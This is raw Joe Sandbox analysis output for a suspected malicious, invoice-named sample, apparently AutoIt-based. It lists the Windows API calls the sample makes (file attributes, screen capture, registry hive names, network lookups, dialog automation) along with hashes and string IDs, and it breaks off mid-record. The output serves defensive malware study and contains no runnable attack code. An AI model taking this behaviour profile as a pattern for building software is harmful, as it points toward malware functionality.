                                                                            • Opcode Fuzzy Hash: 1188e92164fc988d233f1db89faec032cde0059c0190ef97ec2c34170f9b9647
                                                                            • Instruction Fuzzy Hash: 0802BE715083409FC724EF24C881AAFBBE5EF95314F145C2EF495A72A2DB30D94AEB52
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 00F3DA10
                                                                            • _wcscat.LIBCMT ref: 00F3DA28
                                                                            • _wcscat.LIBCMT ref: 00F3DA3A
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3DA4F
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DA63
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3DA7B
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F3DA95
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DAA7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: cf62e380f33be48f7a5eaf1a420c37cb7ec5286fe43ece3b8f1ea8ceeae17700
                                                                            • Instruction ID: 7d109233c77e670717e1138087f611215e01a67da03624918457a3d5a2b2b3b8
                                                                            • Opcode Fuzzy Hash: cf62e380f33be48f7a5eaf1a420c37cb7ec5286fe43ece3b8f1ea8ceeae17700
                                                                            • Instruction Fuzzy Hash: AD81B1729043449FCB24EF64D840AAAB7E8FF89734F14482EF889D7251E734E945EB52
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00F4738F
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F4739B
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00F473A7
                                                                            • SelectObject.GDI32(00000000,?), ref: 00F473B4
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F47408
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F47444
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F47468
                                                                            • SelectObject.GDI32(00000006,?), ref: 00F47470
                                                                            • DeleteObject.GDI32(?), ref: 00F47479
                                                                            • DeleteDC.GDI32(00000006), ref: 00F47480
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00F4748B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 7dbf93930544655d5546429e6ca1f8396b2fd089934ca9dc2d0ab99fc502865a
                                                                            • Instruction ID: 78bc1643104a48eea15e6f0e6579f61396df4555e9e5bab6f35b429f58e551a7
                                                                            • Opcode Fuzzy Hash: 7dbf93930544655d5546429e6ca1f8396b2fd089934ca9dc2d0ab99fc502865a
                                                                            • Instruction Fuzzy Hash: 39514772904309EFCB14DFA8CC84EAEBBB9EF48310F148469FA5AA7251C731A9449B50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32D50
                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F32DDD
                                                                            • GetMenuItemCount.USER32(00F95890), ref: 00F32E66
                                                                            • DeleteMenu.USER32(00F95890,00000005,00000000,000000F5,?,?), ref: 00F32EF6
                                                                            • DeleteMenu.USER32(00F95890,00000004,00000000), ref: 00F32EFE
                                                                            • DeleteMenu.USER32(00F95890,00000006,00000000), ref: 00F32F06
                                                                            • DeleteMenu.USER32(00F95890,00000003,00000000), ref: 00F32F0E
                                                                            • GetMenuItemCount.USER32(00F95890), ref: 00F32F16
                                                                            • SetMenuItemInfoW.USER32(00F95890,00000004,00000000,00000030), ref: 00F32F4C
                                                                            • GetCursorPos.USER32(?), ref: 00F32F56
                                                                            • SetForegroundWindow.USER32(00000000), ref: 00F32F5F
                                                                            • TrackPopupMenuEx.USER32(00F95890,00000000,?,00000000,00000000,00000000), ref: 00F32F72
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F32F7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 3993528054-0
                                                                            • Opcode ID: 64f640a56b35af38440f7f32869b13caaefbb4894840617f88b49f54cf403f6c
                                                                            • Instruction ID: a0ac584b532a2a482bb6bf1e07584642ef32664e32673fb9a0e4cb4b49be5487
                                                                            • Opcode Fuzzy Hash: 64f640a56b35af38440f7f32869b13caaefbb4894840617f88b49f54cf403f6c
                                                                            • Instruction Fuzzy Hash: 8271D571A00209BBEB619F64DC46FAABF64FF04734F144216F625AA1E1C771AC54FB90
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: 5f1dd12fa48611f9437bb5fa33ea36356743dad385b3d1ba411b2a61caa01107
                                                                            • Instruction ID: 92b2507a7c97c33f807d1e3a0d6dcf5f12b81b6a0ac6eef86cff9bd96fc5b578
                                                                            • Opcode Fuzzy Hash: 5f1dd12fa48611f9437bb5fa33ea36356743dad385b3d1ba411b2a61caa01107
                                                                            • Instruction Fuzzy Hash: B4419A3250464A8BCF20EF10D962AFE33A4EF11311F194455FE512B293DB709D1AEBA0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F0E2A0,00000010,?,Bad directive syntax error,00F5F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F2F7C2
                                                                            • LoadStringW.USER32(00000000,?,00F0E2A0,00000010), ref: 00F2F7C9
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • _wprintf.LIBCMT ref: 00F2F7FC
                                                                            • __swprintf.LIBCMT ref: 00F2F81E
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F2F88D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1506413516-4153970271
                                                                            • Opcode ID: 1c5a2d301af214c65165b940fcf2ffe9724648d151efd1e64d5f0d67534e2ad5
                                                                            • Instruction ID: 5e77f530dcd6f3cc5bbc144f890099583d173828b38f8e2f31a431dd7bd22039
                                                                            • Opcode Fuzzy Hash: 1c5a2d301af214c65165b940fcf2ffe9724648d151efd1e64d5f0d67534e2ad5
                                                                            • Instruction Fuzzy Hash: 57216D3291021EAFCF11EF90CC1AEEEB779FF18301F040466B655761A2EA319619EB51
                                                                            APIs
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                              • Part of subcall function 00ED7924: _memmove.LIBCMT ref: 00ED79AD
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F35330
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F35346
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F35357
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F35369
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F3537A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: cd8b29a80058303682684c57a8b2a5c739bb2dbda9f6dc83994c0359c744bd93
                                                                            • Instruction ID: 6a41459310bb9fd71772aa47e9e7934bbcb5dedc5084ef40a1029814fee43a3d
                                                                            • Opcode Fuzzy Hash: cd8b29a80058303682684c57a8b2a5c739bb2dbda9f6dc83994c0359c744bd93
                                                                            • Instruction Fuzzy Hash: B4118221A9022979D720B765CC5ADFFBBBCEBD5F90F80042AB451A21D1EEA04D06D6A1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 208665112-3771769585
                                                                            • Opcode ID: 3d1a11e818d3309f96adeed9d5f2531ebcdaa6072419d41c4180be8bb1985add
                                                                            • Instruction ID: c96af789b3336a500df0bc3e124a27f2420e2dd0c6a69fd65ed031b4fe5f2d85
                                                                            • Opcode Fuzzy Hash: 3d1a11e818d3309f96adeed9d5f2531ebcdaa6072419d41c4180be8bb1985add
                                                                            • Instruction Fuzzy Hash: 8C11D531900218ABCB14AB309C46EEA77BCEF02732F0441BAF645A6091EF71A985AA51
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00F34F7A
                                                                              • Part of subcall function 00EF049F: timeGetTime.WINMM(?,7707B400,00EE0E7B), ref: 00EF04A3
                                                                            • Sleep.KERNEL32(0000000A), ref: 00F34FA6
                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F34FCA
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F34FEC
                                                                            • SetActiveWindow.USER32 ref: 00F3500B
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F35019
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F35038
                                                                            • Sleep.KERNEL32(000000FA), ref: 00F35043
                                                                            • IsWindow.USER32 ref: 00F3504F
                                                                            • EndDialog.USER32(00000000), ref: 00F35060
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 3519a3b012e5b2690632ebd70df3038c18e62d9bbb6dca72bf6c959f83a73ee0
                                                                            • Instruction ID: 9ea7943e55d69e9b2d7612a715775cc1fd8ad89c3a02c37fd6c94ac4242a2bdb
                                                                            • Opcode Fuzzy Hash: 3519a3b012e5b2690632ebd70df3038c18e62d9bbb6dca72bf6c959f83a73ee0
                                                                            • Instruction Fuzzy Hash: 8221A17060070DAFE7215F30EC89B2A3B69EB46B66F0E1025F601C21B5DB729D04BB62
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3D5EA
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F3D67D
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00F3D691
                                                                            • CoCreateInstance.COMBASE(00F62D7C,00000000,00000001,00F88C1C,?), ref: 00F3D6DD
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F3D74C
                                                                            • CoTaskMemFree.COMBASE(?), ref: 00F3D7A4
                                                                            • _memset.LIBCMT ref: 00F3D7E1
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00F3D81D
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F3D840
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F3D847
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F3D87E
                                                                            • CoUninitialize.COMBASE ref: 00F3D880
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: 9461851a5315cf83dcea2400ea0aa119950681c50207009217e17e30f11ec92b
                                                                            • Instruction ID: c893839b5ff86a94e291d93c35dc02fe64dcab3d252f33fd4d8e0a5a37416315
                                                                            • Opcode Fuzzy Hash: 9461851a5315cf83dcea2400ea0aa119950681c50207009217e17e30f11ec92b
                                                                            • Instruction Fuzzy Hash: 3DB1FA75A00209AFDB04DFA4D885DAEBBF9FF48314F1484A9E909EB261DB30ED45DB50
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00F2C283
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C295
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F2C2F3
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00F2C2FE
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C310
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F2C364
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F2C372
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C383
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F2C3C6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00F2C3D4
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F2C3F1
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F2C3FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: d1d74614409854818ca6ac9b4a8f30a306eb1338490fb37d8ace9e9788101579
                                                                            • Instruction ID: ae96f78791427a1ef58bbfaf8f76607bb4687f922ea4fffeb9b62d18cf9a75e9
                                                                            • Opcode Fuzzy Hash: d1d74614409854818ca6ac9b4a8f30a306eb1338490fb37d8ace9e9788101579
                                                                            • Instruction Fuzzy Hash: A9519071F00309AFDB08CFA8DD89AAEBBBAEB88311F14856DF605D7290D7709D049B50
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • GetSysColor.USER32(0000000F), ref: 00ED21D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 57aadfa08a6c058d0b4484db89316ef36e64af0634d3a39912d88d01df47907e
                                                                            • Instruction ID: d9e745da3c7f3635ecca0e9f74d8e1ea779da000d69f8d2bb5f71af780a186a8
                                                                            • Opcode Fuzzy Hash: 57aadfa08a6c058d0b4484db89316ef36e64af0634d3a39912d88d01df47907e
                                                                            • Instruction Fuzzy Hash: 0441A631404644DFDB255F68EC48BB93B65EB16331F1452AAFF659A2F1C7318C42EB21
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00F5F910), ref: 00F3A90B
                                                                            • GetDriveTypeW.KERNEL32(00000061,00F889A0,00000061), ref: 00F3A9D5
                                                                            • _wcscpy.LIBCMT ref: 00F3A9FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1000479233
                                                                            • Opcode ID: eed725c268af16c3dcb4bb412e348f5a7ef7795fad9dc21babf08e6ec46d17d3
                                                                            • Instruction ID: 120827703bbb9f89d19d93b82145586d5eb6a5b8e8b815d166989edf50e5af9f
                                                                            • Opcode Fuzzy Hash: eed725c268af16c3dcb4bb412e348f5a7ef7795fad9dc21babf08e6ec46d17d3
                                                                            • Instruction Fuzzy Hash: 3D51AA325083019BC700EF15C992AAFB7E5EF84760F40586EF9D5A72A2DB31990ADB53
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 5b9886e43883da92f03a6437b1411af787e34622ecc1342368bf3a098ccdaf84
                                                                            • Instruction ID: 29dd812d217ed42f66eacc83c1fe4de3ec1b0bc86d500a78fb6e12718fc5aec7
